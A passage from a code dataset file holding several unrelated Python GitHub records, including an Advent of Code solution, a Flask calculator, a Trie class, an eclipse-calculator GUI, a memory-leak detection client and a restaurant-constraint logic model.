events.update(data=incr_by_one)\n for event in events:\n assert event.data['count'] == 1\n\n\n@pytest.mark.django_db\ndef test_json_incrementer_increments_count(events):\n events.update(data={\"count\": 1})\n incr_by_one = JsonbFieldIncrementer('data', 'count', 1)\n events.update(data=incr_by_one)\n for event in events:\n assert event.data['count'] == 2\n# end::testing_jsonb_incrementer[]\n","repo_name":"abrookins/quest","sub_path":"analytics/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"2"} +{"seq_id":"24242377310","text":"import re\ndef calc_a(input):\n ancestors = set()\n\n rows = input.split('\\n')\n # collect all ancestors\n for row in rows:\n if '->' in row:\n children = row.split('->')[1].split()\n for child in children:\n ancestors.add(child.replace(',', ''))\n\n # get node that's not an ancestor\n for row in rows:\n node = row.split()[0]\n if node not in ancestors:\n return node\n\n return \"not found \"\n\ndef calc_b(input):\n nodes = {}\n weight_patter = re.compile(\".*\\((\\d+)\\).*\")\n\n rows = input.split('\\n')\n # create all nodes\n for row in rows:\n name = row.split()[0]\n m = weight_patter.match(row)\n weight = int(m.group(1), 10)\n node = Node(weight, name)\n nodes[name] = node\n\n # build graph (connect all children)\n for row in rows:\n if '->' in row:\n name = row.split()[0]\n node = nodes[name]\n children = row.split('->')[1].split()\n for child in children:\n child_name = child.replace(',', '')\n child_node = nodes[child_name]\n node.add_child(child_node)\n\n parent_name = calc_a(input)\n\n parent_node = nodes[parent_name]\n\n return parent_node.find_imbalance()\n\n\n\nclass Node:\n\n def __init__(self, weight, name):\n self.weight = weight\n self.name = name\n self.children = []\n\n def add_child(self, node):\n self.children.append(node)\n\n def get_weight(self):\n child_weights = 0\n\n for child in self.children:\n child_weights += child.get_weight()\n return self.weight + child_weights\n\n def has_imbalanced_children(self):\n if len(self.children) == 0:\n return False\n weight = self.children[0].get_weight()\n for child in self.children:\n if child.get_weight() != weight:\n 
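# a sibling's total weight differs from the first child's, so this subtree is imbalanced\n                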
return True\n        return False\n\n    def find_imbalance(self):\n        # seems like there's always an overweight rather than underweight\n        max = 0\n        min = 999999999\n        for child in self.children:\n            # print(child.name, child.get_weight(), child.weight)\n            if child.get_weight() < min:\n                min = child.get_weight()\n            if child.get_weight() > max:\n                max = child.get_weight()\n                unbalanced_node = child\n\n        if unbalanced_node.has_imbalanced_children():\n            return unbalanced_node.find_imbalance()\n\n        return unbalanced_node.weight - (max - min)","repo_name":"alphapeter/AoC2017","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"36410331377","text":"from flask import Flask, render_template, request, redirect, flash, get_flashed_messages\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n\tif request.method == \"POST\":\n\t\top = request.form['op']\n\t\tfnum = request.form['fnum']\n\t\tsnum = request.form['snum']\n\t\ttry:\n\t\t\tif '.' in fnum:\n\t\t\t\tfnum = float(fnum)\n\t\t\telse:\n\t\t\t\tfnum = int(fnum)\n\t\t\tif '.' in snum:\n\t\t\t\tsnum = float(snum)\n\t\t\telse:\n\t\t\t\tsnum = int(snum)\n\t\texcept ValueError:\n\t\t\treturn redirect(\"/result/error\")\n\t\tresult = 0\n\t\tif op == \"add\":\n\t\t\tresult = fnum + snum\n\t\telif op == \"sub\":\n\t\t\tresult = fnum - snum\n\t\telif op == \"mult\":\n\t\t\tresult = fnum * snum\n\t\telif op == \"divide\":\n\t\t\tresult = fnum / snum\n\t\tflash(result)\n\t\treturn redirect(\"/result/\" + op)\n\treturn render_template(\"home.html\")\n\n@app.route('/result/')\ndef op(op):\n\tif op == \"error\":\n\t\treturn render_template(\"error.html\", error=\"Must be ints or floats.\")\n\tmsgs = get_flashed_messages()\n\tif len(msgs) == 0:\n\t\treturn render_template(\"error.html\", error=\"Error occurred. 
Try again.\")\n\treturn render_template(\"result.html\", result=msgs[0])\n\n@app.errorhandler(404)\ndef err_404(e):\n\treturn render_template(\"err.html\", errorcode=404)\n\n@app.errorhandler(403)\ndef err_403(e):\n\treturn render_template(\"err.html\", errorcode=403)\n\n@app.errorhandler(500)\ndef err_500(e):\n\treturn render_template(\"err.html\", errorcode=500)\n\nif __name__ == \"__main__\":\n\tapp.run()\n","repo_name":"mohsinmalik324/school-sbu","sub_path":"cse337/hw4/Mohsin_Malik_110880864/q2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2091903178","text":"import subprocess\nimport os\nimport numpy\n\neccentricity_filenames = ['eccen0', 'eccen01a', 'eccen02a', 'eccen03a', 'eccen04a', 'eccen05a', 'eccen06a']\n\nbinary_ratio_filenames = ['br_0010', 'br_0050', 'br_0100']\n\nfor edir in eccentricity_filenames:\n for bdir in binary_ratio_filenames:\n cdir = os.path.join(edir, bdir, 'gas_only_hr/')\n output=subprocess.check_output('cp phantomanalysis ' + cdir, stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n print(output)\n os.chdir(cdir)\n print('cd ' + cdir)\n output = subprocess.check_output('ls', stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n\n print(output)\n output = subprocess.check_output('./phantomanalysis gas_only_hr_0*', stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n print(output)\n sink1 = numpy.genfromtxt('sinkpositions_1.dat', dtype=None)\n sink2 = numpy.genfromtxt('sinkpositions_2.dat')\n # print(sink1)\n dumpfile = []\n xs = []\n ys = []\n zs = []\n\n xc = []\n yc = []\n zc = []\n\n for i in range(0, len(sink1)):\n dumpfile.append(sink1[i][0])\n xs.append(sink1[i][2])\n ys.append(sink1[i][3])\n zs.append(sink1[i][4])\n\n xc.append(sink2[i][2])\n yc.append(sink2[i][3])\n zc.append(sink2[i][4])\n\n xyzs = numpy.array([xs, ys, zs])\n xyzc = numpy.array([xc, yc, zc])\n\n product = []\n for i in range(0, len(zc)):\n product.append(numpy.dot([xs[i], ys[i], zs[i]], [xc[i], yc[i], zc[i]]))\n\n # print(xyzs)\n # product = xyzc @ xyzs\n print(numpy.min(product))\n print(numpy.max(product))\n print(dumpfile[int(numpy.argmin(product))])\n print(dumpfile[int(numpy.argmax(product))])\n with open('aphelion_perihelion.txt', 'w') as f:\n f.write('aphelion in file ' + str(dumpfile[int(numpy.argmin(product))]) + '\\n')\n f.write('perihelion in file ' + str(dumpfile[int(numpy.argmax(product))]) + '\\n')\n # print(sink1[:][2])\n os.chdir('../../../')\n # exit()\n","repo_name":"joshcalcino/EccenBinary","sub_path":"do_analysis.py","file_name":"do_analysis.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70889589807","text":"\"\"\"\nGiven a pre-trained model, run mvsc on it, and print scores vs gold standard\n\nwe'll use view1 encoder to encode each of view1 and view2, and then pass that through mvsc algo\n\nthis should probably be folded innto run_clustering.py (originally kind of forked from\nrun_clustering.py, and combined with some things from train_pca.py and train.py)\n\"\"\"\nimport time\nimport random\nimport datetime\nimport argparse\n\nimport sklearn.cluster\nimport numpy as np\nimport torch\n\nfrom metrics import cluster_metrics\nfrom model import multiview_encoders\nfrom proc_data import Dataset\n\ntry:\n import multiview\nexcept Exception as e:\n print('please install 
https://github.com/mariceli3/multiview')\n print('eg pip install git+https://github.com/mariceli3/multiview')\n raise e\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nBATCH_SIZE = 32\n\n\ndef transform(dataset, perm_idx, model, view):\n \"\"\"\n for view1 utterance, simply encode using view1 encoder\n for view 2 utterances:\n - encode each utterance, using view 1 encoder, to get utterance embeddings\n - take average of utterance embeddings to form view 2 embedding\n \"\"\"\n model.eval()\n latent_zs, golds = [], []\n n_batch = (len(perm_idx) + BATCH_SIZE - 1) // BATCH_SIZE\n for i in range(n_batch):\n indices = perm_idx[i*BATCH_SIZE:(i+1)*BATCH_SIZE]\n v1_batch, v2_batch = list(zip(*[dataset[idx][0] for idx in indices]))\n golds += [dataset[idx][1] for idx in indices]\n if view == 'v1':\n latent_z = model(v1_batch, encoder='v1')\n elif view == 'v2':\n latent_z_l = [model(conv, encoder='v1').mean(dim=0) for conv in v2_batch]\n latent_z = torch.stack(latent_z_l)\n latent_zs.append(latent_z.cpu().data.numpy())\n latent_zs = np.concatenate(latent_zs)\n return latent_zs, golds\n\n\ndef run(\n ref, model_path, num_clusters, num_cluster_samples, seed,\n out_cluster_samples_file_hier,\n max_examples, out_cluster_samples_file,\n data_path, view1_col, view2_col, label_col,\n sampling_strategy, mvsc_no_unk):\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n id_to_token, token_to_id, vocab_size, word_emb_size, mvc_encoder = \\\n multiview_encoders.load_model(model_path)\n print('loaded model')\n\n print('loading dataset')\n dataset = Dataset(data_path, view1_col=view1_col, view2_col=view2_col, label_col=label_col)\n n_cluster = len(dataset.id_to_label) - 1\n print(\"loaded dataset, num of class = %d\" % n_cluster)\n\n idxes = dataset.trn_idx_no_unk if mvsc_no_unk else dataset.trn_idx\n trn_idx = [x.item() for x in np.random.permutation(idxes)]\n if max_examples is not None:\n trn_idx = trn_idx[:max_examples]\n\n num_clusters = n_cluster if num_clusters is None else num_clusters\n print('clustering over num clusters', num_clusters)\n\n mvsc = multiview.mvsc.MVSC(\n k=n_cluster\n )\n latent_z1s, golds = transform(dataset, trn_idx, mvc_encoder, view='v1')\n latent_z2s, _ = transform(dataset, trn_idx, mvc_encoder, view='v2')\n print('running mvsc', end='', flush=True)\n start = time.time()\n preds, eivalues, eivectors, sigmas = mvsc.fit_transform(\n [latent_z1s, latent_z2s], [False] * 2\n )\n print('...done')\n mvsc_time = time.time() - start\n print('time taken %.3f' % mvsc_time)\n\n lgolds, lpreds = [], []\n for g, p in zip(golds, list(preds)):\n if g > 0:\n lgolds.append(g)\n lpreds.append(p)\n prec, rec, f1 = cluster_metrics.calc_prec_rec_f1(\n gnd_assignments=torch.LongTensor(lgolds).to(device),\n pred_assignments=torch.LongTensor(lpreds).to(device))\n acc = cluster_metrics.calc_ACC(\n torch.LongTensor(lpreds).to(device), torch.LongTensor(lgolds).to(device))\n silhouette = sklearn.metrics.silhouette_score(latent_z1s, preds, metric='euclidean')\n davies_bouldin = sklearn.metrics.davies_bouldin_score(latent_z1s, preds)\n print(f'{datetime.datetime.now()} pretrain: eval prec={prec:.4f} rec={rec:.4f} f1={f1:.4f} '\n f'acc={acc:.4f} sil={silhouette:.4f}, db={davies_bouldin:.4f}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--seed', type=int, default=123)\n parser.add_argument('--max-examples', type=int,\n help='since we might not want to cluster entire dataset?')\n parser.add_argument('--mvsc-no-unk', 
action='store_true',\n help='only feed non-unk data to MVSC (to avoid oom)')\n parser.add_argument('--ref', type=str, required=True)\n parser.add_argument('--model-path', type=str, required=True)\n parser.add_argument('--data-path', type=str, default='./data/airlines_500_merged.csv')\n parser.add_argument('--view1-col', type=str, default='view1_col')\n parser.add_argument('--view2-col', type=str, default='view2_col')\n parser.add_argument('--label-col', type=str, default='cluster_id')\n parser.add_argument('--num-clusters', type=int, help='defaults to number of supervised classes')\n parser.add_argument('--num-cluster-samples', type=int, default=10)\n parser.add_argument('--sampling-strategy', type=str,\n choices=['uniform', 'nearest'], default='nearest')\n parser.add_argument('--out-cluster-samples-file-hier', type=str,\n default='tmp/cluster_samples_hier_{ref}.txt')\n parser.add_argument('--out-cluster-samples-file', type=str,\n default='tmp/cluster_samples_{ref}.txt')\n args = parser.parse_args()\n args.out_cluster_samples_file = args.out_cluster_samples_file.format(**args.__dict__)\n args.out_cluster_samples_file_hier = args.out_cluster_samples_file_hier.format(**args.__dict__)\n run(**args.__dict__)\n","repo_name":"asappresearch/dialog-intent-induction","sub_path":"run_mvsc.py","file_name":"run_mvsc.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"2"} +{"seq_id":"71057729006","text":"# A trie (pronounced as \"try\") or prefix tree is a tree data structure used to efficiently store and retrieve keys in a dataset of strings. There are various applications of this data structure, such as autocomplete and spellchecker.\n\n# Implement the Trie class:\n\n# Trie() Initializes the trie object.\n# void insert(String word) Inserts the string wordinto the trie.\n# int countWordsEqualTo(String word) Returns the number of instances of the string word in the trie.\n# int countWordsStartingWith(String prefix)Returns the number of strings in the trie that have the string prefix as a prefix.\n# void erase(String word) Erases the string wordfrom the trie.\n\n# Example 1:\n# Input\n# [\"Trie\", \"insert\", \"insert\", \"countWordsEqualTo\", \"countWordsStartingWith\", \"erase\", \"countWordsEqualTo\", \"countWordsStartingWith\", \"erase\", \"countWordsStartingWith\"]\n# [[], [\"apple\"], [\"apple\"], [\"apple\"], [\"app\"], [\"apple\"], [\"apple\"], [\"app\"], [\"apple\"], [\"app\"]]\n# Output\n# [null, null, null, 2, 2, null, 1, 1, null, 0]\n\n# Explanation\n# Trie trie = new Trie();\n# trie.insert(\"apple\"); // Inserts \"apple\".\n# trie.insert(\"apple\"); // Inserts another \"apple\".\n# trie.countWordsEqualTo(\"apple\"); // There are two instances of \"apple\" so return 2.\n# trie.countWordsStartingWith(\"app\"); // \"app\" is a prefix of \"apple\" so return 2.\n# trie.erase(\"apple\"); // Erases one \"apple\".\n# trie.countWordsEqualTo(\"apple\"); // Now there is only one instance of \"apple\" so return 1.\n# trie.countWordsStartingWith(\"app\"); // return 1\n# trie.erase(\"apple\"); // Erases \"apple\". 
Now the trie is empty.\n# trie.countWordsStartingWith(\"app\"); // return 0\nfrom typing import Optional\n\n\nclass TrieNode:\n    def __init__(self, value=None, word_count=0, prefix_count=0):\n        self.value = value\n        self.children = [None] * 26\n        self.word_count = word_count\n        self.prefix_count = prefix_count\n\n    def __str__(self) -> str:\n        return f\"{self.value}-{self.word_count}-{self.prefix_count}\"\n\n    def __repr__(self) -> str:\n        return self.__str__()\nclass Trie:\n\n    def __init__(self):\n        self.root = TrieNode()\n\n    def insert(self, word: str) -> None:\n        curr = self.root\n        for char in word:\n            index = ord(char) - 97\n            if curr.children[index] is None:\n                curr.children[index] = TrieNode(char)\n\n            curr.prefix_count += 1\n            curr = curr.children[index]\n        curr.word_count += 1\n\n    def countWordsEqualTo(self, word: str) -> int:\n        curr = self.root\n        for char in word:\n            index = ord(char) - 97\n            if curr.children[index] is None:\n                return 0\n            curr = curr.children[index]\n\n        return curr.word_count\n\n    def countWordsStartingWith(self, prefix: str) -> int:\n        curr = self.root\n        for char in prefix:\n            index = ord(char) - 97\n            if curr.children[index] is None:\n                return 0\n            curr = curr.children[index]\n        # insert() increments prefix_count on every node *before* descending, so the\n        # terminal node is never counted; add word_count to include words ending here\n        return curr.prefix_count + curr.word_count\n    \n    def erase_util(self, root: Optional[TrieNode], word: str):\n        if root is None:\n            return None\n\n        if len(word) == 0:\n            root.word_count -= 1\n\n            if root.word_count > 0:\n                return root\n\n            if root.prefix_count > 0:\n                return root\n            else:\n                del root\n                return None\n        \n        index = ord(word[0]) - 97\n        if not root.children[index]:\n            return root\n        else:\n            child = self.erase_util(root.children[index], word[1:])\n            root.prefix_count -= 1\n            root.children[index] = child\n            return root\n    \n\n    def erase(self, word: str) -> None:\n        # erase_util already decrements the root's prefix_count on its way down,\n        # so no extra decrement is needed here\n        self.root = self.erase_util(self.root, word)\n\n\nif __name__ == '__main__':\n    trie = Trie()\n    print(trie.insert(\"apple\")) # Inserts \"apple\".\n    print(trie.insert(\"apple\")) # Inserts another \"apple\".\n    print(trie.countWordsEqualTo(\"apple\")) # There are two instances of \"apple\" so return 2.\n    print(trie.countWordsStartingWith(\"app\")) # \"app\" is a prefix of \"apple\" so return 2.\n    print(trie.erase(\"apple\")) # Erases one \"apple\".\n    print(trie.countWordsEqualTo(\"apple\")) # Now there is only one instance of \"apple\" so \n    print(trie.countWordsStartingWith(\"app\")) # return 1\n    print(trie.erase(\"apple\")) # Erases \"apple\". 
Now the trie is empty.\n print(trie.countWordsStartingWith(\"app\")) # return 0","repo_name":"ikaushikpal/DS-450-python","sub_path":"Trie/Implement Trie II (Prefix Tree).py","file_name":"Implement Trie II (Prefix Tree).py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"31322788180","text":"from tkinter import *\nfrom tkinter import messagebox\n\n\nimport logging\nfrom os import system as sys\nfrom SolarEclipseCalculator import SolarEclipseCalculator\nfrom LunarEclipseCalculator import LunarEclipseCalculator\nfrom eclipsePlotter import EclipsePlotter\nfrom PIL import ImageTk, Image\n\n\nimport traceback\nimport numpy as np\n\nlogger = logging.getLogger()\n\nclass MyWindow:\n\n\n def __init__(self, win):\n self.lbl_1 = Label(win, text='Select which you want:')\n self.lbl_1.place(x=50, y=50)\n\n self.lbl_2 = Label(win,text='Solar Eclipses')\n self.lbl_2.place(x=60, y=100)\n self.Var1 = IntVar()\n self.btn2 = Radiobutton(win, variable=self.Var1, value=0)\n self.btn2.place(x=150, y=100)\n\n self.lbl_3 = Label(win, text='Lunar Eclipses')\n self.lbl_3.place(x=60, y=130)\n self.btn3 = Radiobutton(win, variable=self.Var1, value=1)\n self.btn3.place(x=150, y=130)\n\n self.lbl_year = Label(win, text='Year:')\n self.lbl_year.place(x=60, y=180)\n self.year_entry = Entry(win)\n self.year_entry.place(x=130, y=180)\n\n self.lbl_month = Label(win, text='Month:')\n self.lbl_month.place(x=60, y=230)\n self.month_entry = Entry(win)\n self.month_entry.place(x=130, y=230)\n self.lbl_month_notice = Label(win, text='(Enter specific month or 13 for whole year)')\n self.lbl_month_notice.place(x=60,y=260)\n\n self.lbl_timestep = Label(win, text='Time Step:')\n self.lbl_timestep.place(x=60, y=300)\n self.timestep_entry = Entry(win)\n self.timestep_entry.place(x=130, y=300)\n\n self.lbl_timestep_notice = Label(win, text='(Suggested Time Step is 60)')\n self.lbl_timestep_notice.place(x=60, y=330)\n\n self.b7 = Button(win, text='Calculate', command=lambda: [self.show_eclipse_times()])\n self.b7.place(x=80, y=380)\n\n self.reset_button = Button(win, text='Reset', command=lambda: self.reset())\n self.reset_button.place(x=180, y=380)\n\n self.plot_button = Button(win, text=\"Plot\", command=lambda: self.plot())\n self.plot_button.place(x=290, y=465)\n\n self.output_listbox = Listbox(win)\n self.output_listbox.place(x=90, y=415)\n\n self.plot_image = Label(win)\n self.plot_image.place(x=350, y=200)\n\n # Used for console testing\n # self.output = Text(win, height=10, width=30)\n # self.output.place(x=400, y=10)\n\n def validate_entry(entry):\n if entry == \"\": return True\n try:\n value = int(entry)\n except ValueError: # oops, couldn't convert to int\n return False\n return 0 <= value <= 100\n\n def check_values(self):\n\n year = self.year_entry.get()\n month = self.month_entry.get()\n timestep = self.timestep_entry.get()\n\n try:\n year = int(year)\n month = int(month)\n timestep = int(timestep)\n except ValueError:\n messagebox.showerror(\"Error\", \"Input must be an integer.\")\n\n if month < 1 or month > 12:\n if month != 13:\n messagebox.showerror(\"Error\", \"Months must be between 1 and 12, or 13\")\n self.reset()\n\n if timestep > 60 or timestep < 1:\n messagebox.showerror(\"Error\", \"Time Step must be between 1 and 60\")\n self.reset()\n if year < 1550 or year > 2650:\n messagebox.showerror(\"Error\", \"Year must be between 1550 and 2650\")\n\n\n\n\n\n def show_eclipse_times(self):\n \"\"\"\n For date user 
entered, calculates the start times when eclipse\n will happen.\n \"\"\"\n global months, year\n\n self.check_values()\n\n eclipse_check = int(self.Var1.get())\n if eclipse_check == 0:\n solar_eclipse_check = 1\n lunar_eclipse_check = 0\n elif eclipse_check == 1:\n solar_eclipse_check = 0\n lunar_eclipse_check = 1\n else:\n print(\"No eclipse selected\")\n\n year = int(self.year_entry.get())\n month = int(self.month_entry.get())\n timestep = int(self.timestep_entry.get())\n\n counter = 0\n # Solar eclipse only calculator\n if solar_eclipse_check == 1 and lunar_eclipse_check == 0:\n\n\n eclipse_dates, months = SolarEclipseCalculator(year, month, timestep).DetermineTimes()\n\n for i in range(1,13,1):\n if eclipse_dates[i][0] != 0:\n self.output_listbox.insert(END, eclipse_dates[i][0])\n counter += 1\n else:\n pass\n if counter == 0:\n pass\n #self.output.insert(END, '{}\\n'.format(\"None Found for that month/year!\"))\n\n # Lunar Eclipse only calculator\n elif solar_eclipse_check == 0 and lunar_eclipse_check == 1:\n\n eclipse_dates, months = LunarEclipseCalculator(year, month, timestep).DetermineTimes()\n\n counter = 0\n for i in range(1, 13, 1):\n if eclipse_dates[i][0] != 0:\n self.output_listbox.insert(END, eclipse_dates[i][0])\n counter += 1\n else:\n pass\n if counter == 0:\n pass\n #self.output.insert(END, '{}\\n'.format(\"None Found for that month/year!\"))\n\n def reset(self):\n \"\"\" Clears the entry fields.\"\"\"\n self.year_entry.delete(0, 'end')\n self.month_entry.delete(0, 'end')\n self.timestep_entry.delete(0, 'end')\n #self.Var1.set(\"\")\n self.Var1.set(0)\n self.output_listbox.delete(0, 'end')\n\n def plot(self):\n \"\"\"\n Generates a plot of the trace of the solar eclipse as it travels\n across the earth's surface.\n \"\"\"\n\n for i in self.output_listbox.curselection():\n selected_month = months[i]\n\n eclipse_dates, _ = SolarEclipseCalculator(year, selected_month, 10)\\\n .DetermineTimes()\n\n lat, lon = EclipsePlotter(eclipse_dates, month=selected_month).latANDlonFinder()\n\n # Class which plots those points onto a graph\n _ = EclipsePlotter(eclipse_dates, month=selected_month).plotter(lat, lon)\n # self.output.insert(END, selected_month)\n\n # Plotting of the generated image\n earth_image = Image.open('./generated_plot.png')\n earth_image = earth_image.resize((400, 200))\n self.img = ImageTk.PhotoImage(earth_image)\n self.plot_image.configure(image=self.img)\n\n\nwindow=Tk()\nmywin=MyWindow(window)\nwindow.title('Eclipse Calculator')\nwindow.geometry(\"800x600\")\nwindow.mainloop()\n","repo_name":"tylera277/solarAndLunarEclipsePredictor","sub_path":"GUI/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13936955029","text":"import sys\nimport rpc.ws\nimport edleak.api\nimport edleak.slice_runner\n\ndef usage():\n print('autodetect [period] [duration]')\n\ndef print_leaker(leaker):\n print('-------------------------------')\n print('class : ' + leaker['leak_factor']['class'])\n print('leak size : ' + str(leaker['leak_factor']['leak']))\n print('call-stack: ')\n for caller in leaker['stack']:\n print(' ' + caller)\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n usage()\n sys.exit(-1)\n\n period = int(sys.argv[1])\n duration = int(sys.argv[2])\n ws_rpc = rpc.ws.WebService(\"localhost\", 8080)\n el = edleak.api.EdLeak(ws_rpc)\n runner = edleak.slice_runner.SliceRunner(el)\n\n # First run, to find the leakers\n print('Starting 1st 
run...')\n asset = runner.run(period, duration)\n allocers = asset.getAllocerList()\n leakers = [l for l in allocers if l['leak_factor']['leak'] > 0 and\n (l['leak_factor']['class'] == 'linear' or\n l['leak_factor']['class'] == 'exp')]\n\n if len(leakers) == 0:\n print('No leaks found.')\n sys.exit(0)\n\n print(str(len(leakers)) + ' leaks found. Starting 2nd run to retrieve callstacks...')\n for leaker in leakers:\n el.addStackWatch(leaker['id'])\n\n asset = runner.run(period, duration)\n allocers = asset.getAllocerList()\n leakers = [l for l in allocers if l['leak_factor']['leak'] > 0 and\n (l['leak_factor']['class'] == 'linear' or\n l['leak_factor']['class'] == 'exp')]\n\n\n for leaker in leakers:\n if len(leaker['stack']) > 1:\n print_leaker(leaker)\n","repo_name":"tpham3783/edKit","sub_path":"client/python/examples/edleak_autodetect.py","file_name":"edleak_autodetect.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27981595495","text":"\"\"\"\nNicholas Falconi\nLizzy Klosa\nKaitlyn hung\nAlex baldassare\n\nCISC 204\nModelling project\nWed december 9th 2020\nProfessor Muise\n\"\"\"\n\n#Import\nfrom nnf import Var\nfrom nnf import Or\nimport nnf\nfrom lib204 import Encoding\nfrom csvReader import readCSV\n\n'''\nCustomer class\n\nUsed to create a class containing the various restrictions a \nperson might have with a restaurant\nParamaters:\n price: Price range being searched for\n diet: any diet restrictions\n dine_opt: preferred dining options\n'''\nclass customer:\n def __init__(self, price_opt, diet_opt, dine_opt,distance):\n self.userprice = price_opt\n self.userdiet = diet_opt\n self.userdine_opt = dine_opt\n self.distance = distance\n\n#Defining variables for encoding\n\n#Price point variables\nlow = Var('low')\nmed = Var('med')\nhigh = Var('high')\n\n#Dietary restriction food options variables\nvegetarian = Var('vegetarian')\nvegan = Var('vegan')\ngluten = Var('gluten')\nlactose = Var('lactose')\n\n#Dining variables\ndine_in = Var('dine-in')\ntake_out = Var('take-out')\ndelivery = Var('delivery')\n\n#Distance variables\ntime_under_10 = Var('under 10')\ntime_10_to_20 = Var('10 to 20')\ntime_over_20 = Var('over 20')\n\n\n#Constraints\n\n\"\"\"\nIf the user selected a price constraint and it matches \n$,$$,$$$. 
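The customer's userprice field holds one of the strings 'low', 'med' or 'high'. 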
If the restaurant matches the price point then\nthe constraint will get returned so that it only holds true \nfor that instance.\n\nParameters: Restaurant object, Customer object\nReturns: A price constraint\n\"\"\"\ndef price_constraint(restaurant,customer):\n    \n    #For low price point\n    if \"low\" in customer.userprice:\n        if restaurant.price == \"$\":\n            return low & ~med & ~high\n        else:\n            return low & ~low\n\n    #For the med price point\n    if \"med\" in customer.userprice:\n        if restaurant.price == \"$$\":\n            return med & ~high & ~low\n        else:\n            return med & ~med\n\n    #For the high price point\n    if \"high\" in customer.userprice:\n        if restaurant.price == \"$$$\":\n            return high & ~low & ~med\n        else:\n            return high & ~high\n\n\"\"\"\nIf the user selected a single dietary restriction the\nappropriate constraint will get returned so it only \nholds true for that instance.\n\nParameters: Restaurant object, Customer object\nReturns: A single dietary restriction constraint\n\"\"\"\ndef single_diet_constraint(restaurant, customer):\n    \n    #For gluten free \n    if 'gluten' in customer.userdiet:\n        if 'TRUE' in restaurant.diet[2]:\n            return gluten & ~vegan & ~vegetarian & ~lactose\n        else:\n            return ~gluten & gluten\n\n    #For lactose\n    elif 'lactose' in customer.userdiet:\n        if 'TRUE' in restaurant.diet[3]:\n            return ~gluten & ~vegan & ~vegetarian & lactose\n        else:\n            return ~lactose & lactose\n\n    #For vegetarian\n    elif 'vegetarian' in customer.userdiet:\n        if 'TRUE' in restaurant.diet[1]:\n            return ~gluten & ~vegan & vegetarian & ~lactose\n        else:\n            return ~vegetarian & vegetarian\n\n    #For vegan\n    elif 'vegan' in customer.userdiet:\n        if 'TRUE' in restaurant.diet[0]:\n            return ~gluten & vegan & ~vegetarian & ~lactose\n        else:\n            return ~vegan & vegan\n\n\"\"\"If the user selected two dietary restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: A single two dietary restriction constraint\n\"\"\"\ndef two_diet_constraint(restaurant, customer):\n    \n    #For vegetarian and vegan customers\n    if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet):\n        if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]):\n            return vegetarian & vegan & ~lactose & ~gluten\n        else: \n            return vegetarian & ~vegetarian\n    \n    #For vegan and lactose free customers\n    elif ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet): \n        if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[3]):\n            return ~vegetarian & vegan & lactose & ~gluten\n        else: \n            return vegan & ~vegan\n\n    #For vegan and gluten free customers\n    elif ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet): \n        if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[2]):\n            return ~vegetarian & vegan & ~lactose & gluten\n        else: \n            return vegan & ~vegan\n    #For gluten free and lactose free customers\n    elif ('gluten' in customer.userdiet) and ('lactose' in customer.userdiet): \n        if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[3]):\n            return ~vegetarian & ~vegan & lactose & gluten\n        else: \n            return gluten & ~gluten\n\n    #For gluten free and vegetarian customers\n    elif ('gluten' in customer.userdiet) and ('vegetarian' in customer.userdiet): \n        if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[1]):\n            return vegetarian & ~vegan & ~lactose & gluten\n        else: \n            return gluten & ~gluten\n    #For lactose free and vegetarian customers\n    elif ('lactose' in customer.userdiet) and ('vegetarian' in customer.userdiet): \n        if ('TRUE' in restaurant.diet[3]) and ('TRUE' in restaurant.diet[1]):\n            return vegetarian & ~vegan & lactose & ~gluten\n        else: \n            return lactose & ~lactose\n\n\n\"\"\"If the user selected three dietary restrictions the \nappropriate constraint will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single three dietary constraint\n\"\"\"\ndef three_diet_constraint(restaurant,customer):\n\n    # For vegetarian and vegan and gluten free customers\n    if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet):\n        if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[2]):\n            return vegetarian & vegan & ~lactose & gluten\n        else: \n            return vegetarian & ~vegetarian\n\n    # For vegetarian and vegan and lactose free customers\n    elif ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet):\n        if ('TRUE' in restaurant.diet[0]) 